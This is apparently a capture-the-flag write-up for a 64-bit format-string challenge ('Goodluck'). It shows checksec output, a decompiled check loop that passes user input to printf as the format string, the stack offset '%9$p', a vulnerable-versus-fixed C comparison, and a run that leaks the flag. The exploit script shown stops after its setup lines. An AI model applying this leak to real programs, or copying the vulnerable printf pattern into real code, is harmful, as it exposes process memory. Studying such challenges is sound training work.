```
# zer0ptr @ DESKTOP-FHEMUHT in ~/CTF-Training/Pwn/fmtstr/UIUCTF-pwn200Goodluck on git:master x [12:06:12]
$ checksec goodluck
[*] Checking for new versions of pwntools
    To disable this functionality, set the contents of /home/zer0ptr/.cache/.pwntools-cache-3.10/update to 'never' (old way).
    Or add the following lines to ~/.pwn.conf or ~/.config/pwn.conf (or /etc/pwn.conf system-wide):
        [update]
        interval=never
[*] You have the latest version of Pwntools (4.15.0)
[*] '/home/zer0ptr/CTF-Training/Pwn/fmtstr/UIUCTF-pwn200Goodluck/goodluck'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    Stripped: No
```
As you can see, the program has NX enabled and Partial RELRO.

Analyzing the program
```c
for ( j = 0; j <= 21; ++j )
{
  v5 = format[j];
  if ( !v5 || v11[j] != v5 )
  {
    puts("You answered:");
    printf(format);          // user input is passed as the format string
    puts("\nBut that was totally wrong lol get rekt");
    fflush(_bss_start);
    result = 0;
    goto LABEL_11;
  }
}
```
```
pwndbg> fmtarg 0x7fffffffdcf8
The index of format argument : 10 ("%9$p")
```
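Added example, not the challenge's own source: the decompiled check loop above rebuilt as a function, beside a hardened version that passes the answer only as data. The function names, FLAG_LEN, and the stdout stream in place of `_bss_start` are assumptions.

```c
#define _POSIX_C_SOURCE 200809L   /* for strnlen() */
#include <stdio.h>
#include <string.h>

#define FLAG_LEN 22   /* the loop on the page compares indices 0..21 */

/* Reconstruction of the decompiled loop (names assumed).  The user's
 * answer is handed to printf() as the FORMAT argument (CWE-134), so a
 * "%N$p" or "%N$s" in the input reads the N-th argument slot, which on
 * amd64 means whatever sits on the stack there.  gcc and clang report
 * this call with -Wformat-security; the pragma only lets the vulnerable
 * reference build so the two variants can be compared side by side. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
int check_answer_vuln(const char *flag, const char *answer)
{
    for (int j = 0; j < FLAG_LEN; ++j) {
        char c = answer[j];
        if (!c || flag[j] != c) {
            puts("You answered:");
            printf(answer);               /* input used as format string */
            puts("\nBut that was totally wrong lol get rekt");
            fflush(stdout);
            return 0;
        }
    }
    return 1;
}
#pragma GCC diagnostic pop

/* Hardened version with the same accept/reject behaviour for plain input.
 * The format string is now a literal and the answer is only ever DATA:
 * a "%9$s" typed by the user is echoed back as those four characters. */
int check_answer_fixed(const char *flag, const char *answer)
{
    /* Length check first so memcmp() never reads past a short answer. */
    int ok = strnlen(answer, FLAG_LEN) == FLAG_LEN
          && memcmp(flag, answer, FLAG_LEN) == 0;
    if (ok)
        return 1;
    puts("You answered:");
    printf("%s", answer);                 /* constant format, input as data */
    puts("\nBut that was totally wrong lol get rekt");
    fflush(stdout);
    return 0;
}
```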
Exploit
```python
from pwn import *

context(arch='amd64', os='linux')
goodluck = ELF('./goodluck')
sh = process('./goodluck')
```
```
# zer0ptr @ DESKTOP-FHEMUHT in ~/CTF-Training/Pwn/fmtstr/UIUCTF-pwn200Goodluck on git:master x [12:12:00] C:130
$ python3 exp.py
[*] '/home/zer0ptr/CTF-Training/Pwn/fmtstr/UIUCTF-pwn200Goodluck/goodluck'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    Stripped: No
[+] Starting local process './goodluck': pid 7481
[*] Process './goodluck' stopped with exit code 0 (pid 7481)
b"what's the flag\nYou answered:\nflag{flag}\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\nBut that was totally wrong lol get rekt\n"
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$
```